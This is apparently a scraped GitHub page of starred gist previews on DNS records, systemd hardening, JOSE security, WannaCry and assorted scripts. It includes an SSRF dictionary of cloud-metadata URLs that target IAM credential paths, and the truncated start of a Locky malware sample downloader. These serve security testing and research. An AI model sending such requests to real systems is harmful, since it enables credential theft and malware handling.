Thibault NORMAND Zenithar

@alxrdn
alxrdn / dnsmasq_https_rr.py
Last active June 6, 2024 02:52
Generate dnsmasq configuration for HTTPS resource records (RFC 9460)
import dns.rdata # pip3 install dnspython
import io
name = "host.example.com."
rclass = dns.rdataclass.IN
rtype = dns.rdatatype.HTTPS
rdata = '1 . alpn="h3,h2" ipv4hint="XXX.XXX.XXX.XXX"'
rd = dns.rdata.from_text(rclass, rtype, rdata)
@jhaddix
jhaddix / cloud_metadata.txt
Last active October 27, 2024 18:33 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 and $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

@paragonie-scott
paragonie-scott / jose-security.md
Last active June 12, 2020 11:32
Suggestions for a Secure JOSE Alternative (or Protocol Upgrade)

Changes to JOSE that will prevent insecurity

Deletions

JWS and JWE

Drop the alg header

Neither JOSE users nor JOSE library designers should be required to understand cryptography primitives. At a lower level, this can lead to badly implemented primitives. On a higher level, this can lead to reasoning by lego.

@ageis
ageis / systemd_service_hardening.md
Last active November 15, 2024 09:28
Options for hardening systemd service units

security and hardening options for systemd service units

A common and reliable pattern in service unit files is thus:

NoNewPrivileges=yes
PrivateTmp=yes
PrivateDevices=yes
DevicePolicy=closed
ProtectSystem=strict
@augbog
augbog / Free O'Reilly Books.md
Last active July 23, 2024 15:24
Free O'Reilly Books

Free O'Reilly books and convenient script to just download them.

Thanks /u/FallenAege/ and /u/ShPavel/ from this Reddit post

How to use:

  1. Take the download.sh file and put it into a directory where you want the files to be saved.
  2. cd into the directory and make sure that it has executable permissions (chmod +x download.sh should do it)
  3. Run ./download.sh and wee there it goes. Also if you do not want all the files, just simply comment the ones you do not want.
@mak
mak / get_locky.py
Created June 22, 2016 22:16
locky sample downloader
import sys
import hashlib
import struct
import requests
def decode(data,seed,step):
    r = []
    k = seed
    for c in map(ord,data):
        r.append(chr(c ^ k))
@ikwattro
ikwattro / statement.json
Created March 8, 2016 19:51
unwind batching
{
  "statements": [
    {
      "statement": "UNWIND {nodes} as x MERGE (o:Object {um: x.umid}) SET o.value = x.value, o.updated = timestamp()",
      "parameters": {
        "nodes": [
          {
            "umid": 1,
            "value": "bla bla"
          },
@kwilczynski
kwilczynski / disable-ipv6.sh
Last active April 11, 2024 11:09
Amazon Linux OS tweaks
#!/bin/bash
set -u
set -e
set -o pipefail
export PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
cat <<'EOF' > /etc/modprobe.d/blacklist-ipv6.conf
@rgarcia
rgarcia / basic.go
Created June 11, 2014 17:27
golang basic auth transport
import (
	"encoding/base64"
	"fmt"
	"net/http"
)
type BasicAuthTransport struct {
	Username string
	Password string
}